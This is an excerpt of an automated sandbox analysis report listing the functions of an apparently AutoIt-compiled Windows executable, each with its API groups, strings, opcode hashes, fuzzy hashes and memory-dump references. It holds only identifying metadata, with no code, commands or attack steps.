                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3934441357-0
                                                                                          • Opcode ID: a0a1439e265e291f150910246ad1a366446c83d0ba354e2dc0beef75c9ab4ebe
                                                                                          • Instruction ID: 213a4d331c8470b92a7d9cee098fca49f3a3163689b9659d3bc36836ec3f8570
                                                                                          • Opcode Fuzzy Hash: a0a1439e265e291f150910246ad1a366446c83d0ba354e2dc0beef75c9ab4ebe
                                                                                          • Instruction Fuzzy Hash: 9DE01522608A9182D620DB16F44431AE770FB89BC8F944525EB8C47B2ACF7DC5518B80
                                                                                          Function 00007FF74D033EB4 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: LongNamePath
                                                                                          • String ID:
                                                                                          • API String ID: 82841172-0
                                                                                          • Opcode ID: 637964e6b351f452a28879436c201a5e99f96031ec26c8877a7972d1003a59f1
                                                                                          • Instruction ID: 3ec65b50b4c27349389702e8ecfb311d06682db8df101f6fd98beb700b440ea7
                                                                                          • Opcode Fuzzy Hash: 637964e6b351f452a28879436c201a5e99f96031ec26c8877a7972d1003a59f1
                                                                                          • Instruction Fuzzy Hash: B8E0D822B0C745C1D721B72AE2443A8A362FB8C7C4F444031EECC4376ADDACC5848B10
                                                                                          Function 00007FF74D035D88 Relevance: 1.5, APIs: 1, Instructions: 19windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: IconNotifyShell_
                                                                                          • String ID:
                                                                                          • API String ID: 1144537725-0
                                                                                          • Opcode ID: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
                                                                                          • Instruction ID: af5bb6b3cb6d2b8eebb42d6cf1df5962755343c8ea28f2bb4ad471a88981d356
                                                                                          • Opcode Fuzzy Hash: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
                                                                                          • Instruction Fuzzy Hash: E5F03421A1DB82CBE761BB54E408369B6A5F788308F844139D9CD072A6EE7DD306CF20
                                                                                          Function 00007FF74D031080 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Open_onexit
                                                                                          • String ID:
                                                                                          • API String ID: 3030063568-0
                                                                                          • Opcode ID: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
                                                                                          • Instruction ID: 56388a19a1de08b222602906ea007fa55c0441d235a660bbd2ce224eca1f05db
                                                                                          • Opcode Fuzzy Hash: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
                                                                                          • Instruction Fuzzy Hash: DFE0EC50F1E54FC1EA04BB69A8850B4D2A0AF95305FC25636C85D97272FE6CD2A58720
                                                                                          Function 00007FF74D031048 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _onexit
                                                                                          • String ID:
                                                                                          • API String ID: 572287377-0
                                                                                          • Opcode ID: 773ed23fe7bc1dd7e8b75972c2a26041a0abafe16c5f42d1a8e6024edf34d541
                                                                                          • Instruction ID: 3ea482b79b2ca03efcc311072d8a1e8c0ffb3c1b1e15423320e599fdaa605c57
                                                                                          • Opcode Fuzzy Hash: 773ed23fe7bc1dd7e8b75972c2a26041a0abafe16c5f42d1a8e6024edf34d541
                                                                                          • Instruction Fuzzy Hash: 17C01210E5D05BC1E608B3BA48960F441E05FE9300FD00535C44D822A2ED4C91E60721
                                                                                          Function 00007FF74D031064 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: _onexit
                                                                                          • String ID:
                                                                                          • API String ID: 572287377-0
                                                                                          • Opcode ID: 5447c473e94d7294484c99fc93f4d38cb7bf7a8a438e953c913b8a13f1fa59d2
                                                                                          • Instruction ID: fc23f44fe233dbfe7fc20fae339b918ae62be5c9d337267fe6f19ea2783a18d4
                                                                                          • Opcode Fuzzy Hash: 5447c473e94d7294484c99fc93f4d38cb7bf7a8a438e953c913b8a13f1fa59d2
                                                                                          • Instruction Fuzzy Hash: 84C01205E6E05BC1E608B3BA4C960F841A04FE9300FD40135C44D822A2ED1C91E64731
                                                                                          Function 00007FF74D0310E8 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentVersionWow64_onexit
                                                                                          • String ID:
                                                                                          • API String ID: 2932345936-0
                                                                                          • Opcode ID: 03ad02108163b1b9c24d53c6048626981572e85475d5139af19f078af1ef234b
                                                                                          • Instruction ID: ceae11b81075126e0ace23739080ea4f135d583444b7c7335d391d9ac684945a
                                                                                          • Opcode Fuzzy Hash: 03ad02108163b1b9c24d53c6048626981572e85475d5139af19f078af1ef234b
                                                                                          • Instruction Fuzzy Hash: 56C01200E6D05BC0E708B3BA48960F451E08FA5304FD10136C54D822A2FD0C91F60731
                                                                                          Function 00007FF74D0B7E48 Relevance: 1.4, APIs: 1, Instructions: 163COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 1452528299-0
                                                                                          • Opcode ID: b1ea28e244f60b4af54ff34aaaf102a183879d86c5d4002b95e89690f8712e5a
                                                                                          • Instruction ID: 2c47b9989caaf566e9c142eeb582d8b9e653e8db1f589d6eef1d0b04e30672bd
                                                                                          • Opcode Fuzzy Hash: b1ea28e244f60b4af54ff34aaaf102a183879d86c5d4002b95e89690f8712e5a
                                                                                          • Instruction Fuzzy Hash: 12715822B0CA42C6EB50FF66D1943BCA760EB84B84F804536DE8D577A6EF78E445C360
                                                                                          Function 00007FF74D06DDA8 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocHeap
                                                                                          • String ID:
                                                                                          • API String ID: 4292702814-0
                                                                                          • Opcode ID: 56853fc6be513b26808fd6ceb43c2b1e56f5d2842f756231a7c5debb2bb5ead3
                                                                                          • Instruction ID: 63521cb4f2a376045d9eabfc997a02010c36ba600eb98de0fb858707b5194800
                                                                                          • Opcode Fuzzy Hash: 56853fc6be513b26808fd6ceb43c2b1e56f5d2842f756231a7c5debb2bb5ead3
                                                                                          • Instruction Fuzzy Hash: 19F06D04F0D20BC0FE54B7A298283B592915F99B40FC84430CC8E8B2F2FE6CE4518230
                                                                                          Function 00007FF74D06C51C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocHeap
                                                                                          • String ID:
                                                                                          • API String ID: 4292702814-0
                                                                                          • Opcode ID: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
                                                                                          • Instruction ID: f57bd5605f5f9e206bbd73ab8a8320acd3d1c8d550f05c2e5de158a90cedd1d4
                                                                                          • Opcode Fuzzy Hash: d6cab95e1f74feff6e8dd6f9a30a9cf55c0df8872244003ab96fdfaeeafef6ec
                                                                                          • Instruction Fuzzy Hash: B6F0F851B0D247C5FE64B7A26C15279D5905F89BA0FC94634ECAE8B2F2FE6CE4808634

                                                                                          Non-executed Functions

                                                                                          Function 00007FF74D0C56A0 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 476filecommemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                                                          • API String ID: 2211948467-2373415609
                                                                                          • Opcode ID: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
                                                                                          • Instruction ID: e3bb8e4b217b60b6511a7079c8cc280d175db7fcdb8311bb9147424bc983c712
                                                                                          • Opcode Fuzzy Hash: 8e2f89096802004413711948fd726798781e069153c0ca8acc30819db0585273
                                                                                          • Instruction Fuzzy Hash: B2227C36A0C642CAE714FF25E858669B7A0FB88B94F904635DE8E47B74EF3CD4458B10
                                                                                          Function 00007FF74D0DDB18 Relevance: 51.2, APIs: 28, Strings: 1, Instructions: 462windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$MessageSend$Menu$Item$EnableInfoMove$DefaultShow$DrawFocusLongRect
                                                                                          • String ID: P
                                                                                          • API String ID: 1208186926-3110715001
                                                                                          • Opcode ID: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
                                                                                          • Instruction ID: 52fdddde953b373d7993915967dc1091b86e69fb6f5e693ffdff5502400debc2
                                                                                          • Opcode Fuzzy Hash: 0e3e078a853430a05022e0f772db04c3cd8d70c986a797c2cebe1c7d1304ed73
                                                                                          • Instruction Fuzzy Hash: CE120872A0C682C6E724BB25D4687BDA7A0FB45794F804536DE9D07BA4EF3CE441C720
                                                                                          Function 00007FF74D0C32AC Relevance: 47.6, APIs: 22, Strings: 5, Instructions: 327windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                          • String ID: A$AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                          • API String ID: 2910397461-2439800395
                                                                                          • Opcode ID: 6a4158767fd1e3aa62d6cad0ab6a36848a32ab8b88e438b2c1d2663541e17033
                                                                                          • Instruction ID: d5525c7263a7d3c4ed92fa39a902131fefe28f10983a9d3b2e6064164372c478
                                                                                          • Opcode Fuzzy Hash: 6a4158767fd1e3aa62d6cad0ab6a36848a32ab8b88e438b2c1d2663541e17033
                                                                                          • Instruction Fuzzy Hash: 91E1707660C681CBE714EF25E848669B7A0FB88B94F904135DE8E53B64EF7CE444CB10
                                                                                          Function 00007FF74D054514 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 122threadkeyboardwindowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                          • String ID: Shell_TrayWnd
                                                                                          • API String ID: 3778422247-2988720461
                                                                                          • Opcode ID: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
                                                                                          • Instruction ID: 3417a62214feeb9272aeef58058ff63dc9303b783c5bf53089830e2ec386636f
                                                                                          • Opcode Fuzzy Hash: cd6974c24a3c73bdd9695786a971f02835d0cd3b561fa91e9f0f548f8bdf6fbe
                                                                                          • Instruction Fuzzy Hash: 88416521F0C516C7E714BB25A81C73AA2A2BF8DB81FD54435C98A47B74FE3DD84A8760
                                                                                          Function 00007FF74D03183C Relevance: 38.0, APIs: 25, Instructions: 475windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Destroy$ImageList_Window$DeleteMessageObjectSend$IconMove
                                                                                          • String ID:
                                                                                          • API String ID: 3372153169-0
                                                                                          • Opcode ID: cebe50662675a261df0ce57bb688d6874ca0698041b92cdd573b2dd792630721
                                                                                          • Instruction ID: 11662bec3c72cb3540a909f42543df568a501a1c77af9d4f08214517c6947f28
                                                                                          • Opcode Fuzzy Hash: cebe50662675a261df0ce57bb688d6874ca0698041b92cdd573b2dd792630721
                                                                                          • Instruction Fuzzy Hash: 8E22C222A0D687C6EB64BB15E4542BDA3A1FF45B94F944132DA9E0B6B4FF3DE441C320
                                                                                          Function 00007FF74D09CE68 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 227processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$StationWindow$CloseCurrentHandleUser$CreateDuplicate$BlockDesktopEnvironmentHeapOpenProfileToken$AdjustAllocDestroyErrorLastLoadLogonLookupPrivilegePrivilegesThreadUnloadValuewcscpy
                                                                                          • String ID: default$winsta0$winsta0\default
                                                                                          • API String ID: 3202303201-1423368268
                                                                                          • Opcode ID: de7527ded46d2e32930649954c580003a2a01d55c070abe543a614e541a7caf5
                                                                                          • Instruction ID: 8da51638a582ab3a4646b6f9cfc8117f2d6ad91559422997aace3b7a7a6967a1
                                                                                          • Opcode Fuzzy Hash: de7527ded46d2e32930649954c580003a2a01d55c070abe543a614e541a7caf5
                                                                                          • Instruction Fuzzy Hash: 11A15132A0CB41C6E710FF61E4542AAA7A2FB85794F840175EE9D47BA8EF3CE045C760
                                                                                          Function 00007FF74D032AE0 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1669381320.00007FF74D031000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF74D030000, based on PE: true
                                                                                          • Associated: 0000000E.00000002.1669350010.00007FF74D030000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D0E5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669482219.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669551837.00007FF74D11A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                          • Associated: 0000000E.00000002.1669580109.00007FF74D124000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_7ff74d030000_BFmcYQ.jbxd
                                                                                          Similarity
                                                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                          • String ID: AutoIt v3 GUI
                                                                                          • API String ID: 1458621304-248962490
                                                                                          • Opcode ID: b8f5b06e3d0277f3ffc73035af6cc9ad4e685f54e981a48a8f38e285d267cba3
                                                                                          • Instruction ID: fea045a4605ffa7f17e163dd6bbf12e6a4140e56752eeeb171ed9016b5361de0
                                                                                          • Opcode Fuzzy Hash: b8f5b06e3d0277f3ffc73035af6cc9ad4e685f54e981a48a8f38e285d267cba3
                                                                                          • Instruction Fuzzy Hash: B3D16B32A0CA46CAE714FF39E8547A977A1FB48B58F900235DA4E57AA4EF78E444C710
